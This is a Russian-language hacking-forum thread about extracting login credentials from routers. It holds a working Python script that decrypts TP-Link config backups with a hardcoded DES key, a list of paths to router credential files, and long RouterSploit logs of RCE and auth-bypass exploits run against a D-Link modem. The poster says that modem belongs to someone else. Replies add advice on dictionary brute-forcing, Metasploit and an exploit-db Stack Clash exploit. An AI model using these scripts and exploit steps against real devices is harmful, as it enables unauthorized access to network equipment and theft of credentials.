Киньте линк на морду в личку, попытаюсь подробно изучить его. Я уже устал играться картинками пускай администраторы убирают костыли...
Отчасти... Натолкнул ФуйВуй из темы - Пробуем слить бэкап от ломаного\своего роутера. Дальше под линём пытаемся его дешифровать. Code: apt-get install python-crypto готовим скрипт Code: #!/usr/bin/python # from Crypto.Cipher import DES from hashlib import md5 # key = '\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF' crypto = DES.new( key, DES.MODE_ECB ) # data = open('config.bin', 'rb').read() data_decrypted = crypto.decrypt( data ).rstrip('\0') assert data_decrypted[:16] == md5(data_decrypted[16:]).digest() open('config.bin.txt', 'wb').write(data_decrypted[16:]) Сохраняем скрипт и даём право на запуск. Кидаем бэкап в одну папку со скриптом. Запускаем скрипт. Источник - http://zftlab.org/pages/2014021700.html http://teknoraver.net/software/hacks/tplink/ Пути к пасам: ОпенВРТ /etc/config/system - учетные данные от вебки /etc/shadow - учетные данные от телнет/ssh DD-WRT 1. Скачиваем бэкап и открываем с помощью блокнота, все данные без шифрования в текстовом виде. 2.Пути к файлам
Здравствуйте! Возникла необходимость восстановить утерянные логин и пароль доступа к веб-интерфейсу модема D-Link DSL-2750U. Сброс настроек рассматривается как крайний вариант. Попробовал RouterSploit 2.2.1. Установил ее единоразово (т.е. до первой перезагрузки) в среду Live USB Kali Linux 2017.3. Проверка на уязвимость ко всем эксплойтам командой use scanners/autopwn выдала некоторые положительные на первый взгляд результаты. Стал по очереди проверять все. Часть уязвимостей, как следует из их названия (dns change), прописывают DNS от Google в настройках модема, т.е. не рассчитаны на решение моей проблемы. Но для полноты картины попробовал запускать и эти 4 эксплойта. Лог у них получился абсолютно одинаковым. Spoiler: exploits_dns_change exploits/routers/shuttle/915wm_dns_change exploits/routers/dlink/dsl_2740r_dns_change exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change exploits/routers/dlink/dsl_2640b_dns_change [*] Running module... [*] Attempting to change DNS settings... [*] Primary DNS: 8.8.8.8 [*] Secondary DNS: 8.8.4.4 [-] Could not change DNS settings Это означает, что роутер просто не подвержен этим уязвимостям? Все остальные эксплойты (или почти все) уже ориентированы на работу с авторизацией. Проверка работы каждого из них не дала положительных результатов. Прилагаю их логи запуска. Spoiler: exploits/routers/netgear/dgn2200_dnslookup_cgi_rce rsf > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce rsf (Netgear DGN2200 RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target address e.g. http://192.168.1.1 port 80 Target Port Module options: Name Current settings Description ---- ---------------- ----------- username admin Username password password Password rsf (Netgear DGN2200 RCE) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (Netgear DGN2200 RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target http://192.168.1.1 Target address e.g. http://192.168.1.1 port 80 Target Port Module options: Name Current settings Description ---- ---------------- ----------- username admin Username password password Password rsf (Netgear DGN2200 RCE) > run [*] Running module... [*] It is not possible to check if target is vulnerable [*] Trying to invoke command loop... [*] It is blind command injection. Response is not available. [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] Depending on the vulnerability, command's results might not be available. [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands. cmd > exit rsf (Netgear DGN2200 RCE) > back Spoiler: exploits/routers/dlink/dir_815_850l_rce rsf > use exploits/routers/dlink/dir_815_850l_rce rsf (D-Link DIR-815 & DIR-850L RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IP address e.g. 192.168.1.1 rsf (D-Link DIR-815 & DIR-850L RCE) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (D-Link DIR-815 & DIR-850L RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target 192.168.1.1 Target IP address e.g. 192.168.1.1 rsf (D-Link DIR-815 & DIR-850L RCE) > run [*] Running module... [*] It's not possible to check if the target is vulnerable. Try to use following command loop. [*] Invoking command loop... [*] It is blind command injection, response is not available [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] Depending on the vulnerability, command's results might not be available. [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands. cmd > exit rsf (D-Link DIR-815 & DIR-850L RCE) > back Spoiler: exploits/routers/cisco/secure_acs_bypass rsf > use exploits/routers/cisco/secure_acs_bypass rsf (Cisco Secure ACS Unauthorized Password Change) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IP address port 443 Target Port Module options: Name Current settings Description ---- ---------------- ----------- username Username to use path /PI/services/UCP/ Path to UCP WebService password Password to use rsf (Cisco Secure ACS Unauthorized Password Change) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (Cisco Secure ACS Unauthorized Password Change) > show options Target options: Name Current settings Description ---- ---------------- ----------- target http://192.168.1.1 Target IP address port 443 Target Port Module options: Name Current settings Description ---- ---------------- ----------- username Username to use path /PI/services/UCP/ Path to UCP WebService password Password to use rsf (Cisco Secure ACS Unauthorized Password Change) > run [*] Running module... [*] Issuing password change request for: [-] Connection error: http://192.168.1.1:443/PI/services/UCP/ [-] Exploit failed. Target seems to be not vulnerable. rsf (Cisco Secure ACS Unauthorized Password Change) > back P.S. Здесь, как я понял, скорее всего эксплойт просто не подходит для этого роутера. Spoiler: exploits/routers/cisco/catalyst_2960_rocem rsf > use exploits/routers/cisco/catalyst_2960_rocem rsf (Cisco Catalyst 2960 ROCEM RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IP address Module options: Name Current settings Description ---- ---------------- ----------- device -1 Target device - use "show devices" telnet_port 23 Target Port action set set / unset credless authentication for Telnet service rsf (Cisco Catalyst 2960 ROCEM RCE) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (Cisco Catalyst 2960 ROCEM RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target 192.168.1.1 Target IP address Module options: Name Current settings Description ---- ---------------- ----------- device -1 Target device - use "show devices" telnet_port 23 Target Port action set set / unset credless authentication for Telnet service rsf (Cisco Catalyst 2960 ROCEM RCE) > run [*] Running module... [-] Set target device - use "show devices" and "set device <id>" rsf (Cisco Catalyst 2960 ROCEM RCE) > back Spoiler: exploits/routers/billion/5200w_rce rsf > use exploits/routers/billion/5200w_rce rsf (Billion 5200W-T RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target address e.g. http://192.168.1.1 port 80 Target port Module options: Name Current settings Description ---- ---------------- ----------- username admin Default username to log in telnet_port 9999 Telnet port used for exploitation password password Default password to log in rsf (Billion 5200W-T RCE) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (Billion 5200W-T RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- target http://192.168.1.1 Target address e.g. http://192.168.1.1 port 80 Target port Module options: Name Current settings Description ---- ---------------- ----------- username admin Default username to log in telnet_port 9999 Telnet port used for exploitation password password Default password to log in rsf (Billion 5200W-T RCE) > run [*] Running module... [*] Trying to exploit first command injection vulnerability... [-] Exploitation failed for unauthenticated command injection [*] Trying authenticated commad injection vulnerability... [*] Trying exploitation with creds: adminassword [*] Trying exploitation with creds: true:true [*] Trying exploitation with creds: user3:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678 [*] Trying to connect to the telnet server... [-] Exploit failed - Telnet connection error: 192.168.1.1:9999 rsf (Billion 5200W-T RCE) > back И последний лог от эксплойта, которому программа поставила положительный (не сомнительный) результат в плане уязвимости. Spoiler: exploits/routers/3com/3cradsl72_info_disclosure rsf > use exploits/routers/3com/3cradsl72_info_disclosure rsf (3Com 3CRADSL72 Info Disclosure) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target address e.g. http://192.168.1.1 port 80 Target port rsf (3Com 3CRADSL72 Info Disclosure) > set target 192.168.1.1 [+] {'target': '192.168.1.1'} rsf (3Com 3CRADSL72 Info Disclosure) > show options Target options: Name Current settings Description ---- ---------------- ----------- target http://192.168.1.1 Target address e.g. http://192.168.1.1 port 80 Target port rsf (3Com 3CRADSL72 Info Disclosure) > run [*] Running module... [*] Sending request to download sensitive information [+] Exploit success [*] Reading /app_sta.stm file <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>DSL-2750U</title> <meta name="date" content="" /> <meta name="generator" content="no generator" /> <meta name="copyright" content="Copyright (C) 2011 D-Link Russia" /> <meta name="keywords" content="DSL-2750U" /> <meta name="description" content="DSL-2750U" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="content-style-type" content="text/css" /> <meta http-equiv="content-script-type" content="text/javascript" /> <link type="image/x-icon" rel="shortcut icon" href="/favicon.ico" /> <link type="text/css" rel="stylesheet" href="dlink.css?id=1639683028" /> <link type="text/css" rel="stylesheet" href="/css/login.css?id=1639683028" /> <link type="text/css" rel="stylesheet" href="/css/common.css?id=1639683028" /> <!--[if lt IE 8]> <link type="text/css" rel="stylesheet" href="/css/ie6.css?id=1639683028" /> <![endif]--> <script type="text/javascript" src="/scripts/jquery.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/jquery.json.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/dlink.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/login.ui.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/jhmvc.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/device.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/sm_params.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/common1.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/common2.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/login.js?id=1639683028"></script> <script type="text/javascript" src="/scripts/eng.lng.js?id=1639683028"></script> <script>var baselang = new Object(lang);</script> <script type="text/javascript" src="/scripts/rus.lng.js"></script> <script type="text/javascript" src="/scripts/config.lng.js?id=1639683028"></script> <script> var badAuthKey = ""; window.curlang = "rus"; window.encrypt_pass = "0"; $(document).bind('ready', function(){ setTimeout(function(){ deleteCookie("salt"); }, 4200000); start(); }); GLOBAL_VAR("rpcWAN")(); if(window.ttnetRedirect) ttnetRedirect(); if(window.httpIntercept) httpIntercept(); </script> </head> <body> <div id='wrapperWorkspace'> <div id='workspace'> <div id='wrapperHeader'> <div id='miscBlocks' class='unselectable'> <div id='blockLogo'> <img src='/image/dlink_logo.gif' /> </div> <div id='blockVersion'> <span id='v_model'></span> <span id='v_proxy'>DSL-2750U</span><br /><span id='v_firmware'></span> 2.0.17<br /><span id='v_lang'></span> </div> <div id='blockFastmenu'></div> <div class='clear'></div> </div> </div> <div id='wrapperContent'> <div id='errorMsg' class='unselectable' unselectable="on"></div> <div id='authWindow' class='window' style='box-shadow: 0 0 30px #555; -moz-box-shadow: 0 0 30px #555; -webkit-box-shadow: 0 0 30px #555;'> <div class='windowCaption unselectable'> <div class='windowTitle' unselectable="on"></div> <div class='windowPreloader' id='preloader'><img src='' /></div> <div class='clear'></div> </div> <div class='windowContent'> <form id="id_form_main" method="post" enctype="application/x-www-form-urlencoded" action="index.cgi"> <input type="hidden" name="v2" value="y"/> <input type="hidden" name="rs_type" value="html"/> <input type="hidden" name="client_login" value=""/> <input type="hidden" name="client_password" value=""/> <input id="auth" name="auth" type="hidden" value="auth" /> <div class='inputer spacer normal'> <div class='top unselectable'> <div class='title' unselectable="on"></div> <div class='caps' unselectable="on">[Caps Lock]</div> <div class='clear'></div> </div> <div class='bottom'> <div class='data'> <input type='text' id='A1' maxlength='31' /> </div> <div class='clear'></div> </div> </div> <div class='inputer normal'> <div class='top unselectable'> <div class='title' unselectable="on"></div> <div class='caps' unselectable="on">[Caps Lock]</div> <div class='clear'></div> </div> <div class='bottom'> <div class='data'> <input type='password' id='A2' maxlength='31' /> </div> <div class='clear'></div> </div> </div> </div> </form> <div class='windowAction unselectable'> <a href='#'>ÐÑ Ð¾Ð´</a><a href='#'>ÐÑиÑÑиÑÑ</a> </div> </div> </div> </div> </div> </body> </html> [*] Sending request to download sensitive information [-] Exploit failed - could not retrieve response rsf (3Com 3CRADSL72 Info Disclosure) > back Как я понимаю, ни один из этих эксплойтов не подходит для этого роутера? Или есть возможность с помощью какого-либо из них вытащить логин и пароль? Заранее благодарю за ответы!
1. Попробуйте сбрутить простеньким словарем. 2. Найти в интернете эксплоиты на данную модель (например на сайте - exploit-db.com) 3. Фреймворк metasploit также даёт возможность работы с роутерами посмотрите там.
Благодарю за помощь! По первому пункту: имеется ввиду подбор по стандартным и распространенным паролям? Про эксплойты говорили в соседней теме (Router Scan): выяснилось, что под мою модификацию этой модели - со встроенной антенной - нет эксплойтов. Много эксплойтов под более старый вариант - с внешней антенной. Один из таких эксплойтов (по всей видимости) проверял на своей модели - безуспешно: http://xiaopan.co/forums/downloads/d-link-dsl-2750u-authentication-bypass-vulnerability.378/ http://www.routerpwn.com/D-Link/ https://forum.antichat.ru/threads/proga-router-scan.398971/page-275#post-4168904 Metasploit буду пробовать. Только пока не могу разобраться как его применить в моем случае, сложновато...
Благодарю! Ответ я уже написал. Да, решение хорошее, но, с учетом того, что роутер не мой, я ограничусь попытками достать данные с помощью программ. Если ничего не получится, сделаю сброс настроек. Посмотрел в сети документацию по этой программе и возник вопрос: для проверки роутера подойдет вариант автоматического сканирования связкой nmap + db_autopwn? Или это неоптимальный вариант в данном случае? Заранее благодарю!
Ну во первых в текущих версиях этот модуль удалили, а во вторых это не оптимальное решение. Проще вручную найти.
Спасибо! Да, про удаление модуля читал, но видел информацию, что его можно вернуть вручную. Хотя в данном случае это, конечно, уже неактуально. Буду разбираться как делать ручной подбор эксплойтов. Я пробовал подбирать пароль через Router Scan (http) и X-Scan из пакета Intercepter-NG (http + telnet) с их встроенными словарями. Положительного результата добиться не удалось. Этого достаточно по первому пункту рекомендаций?
RouterSploit официально внесли в репозиторий Кали для его установки нужно ввести след. команды Code: apt-get update apt-get install routersploit -y
привет. Кто может помочь с эксплоит https://www.exploit-db.com/exploits/44284/ Не понимаю как его прикрутить к программе или как по другому запустить? когда я его через Питон запускаю, то получаю: Usage: ./StackClashROPsystem.py IP PORT binary shellcommand Спасибо!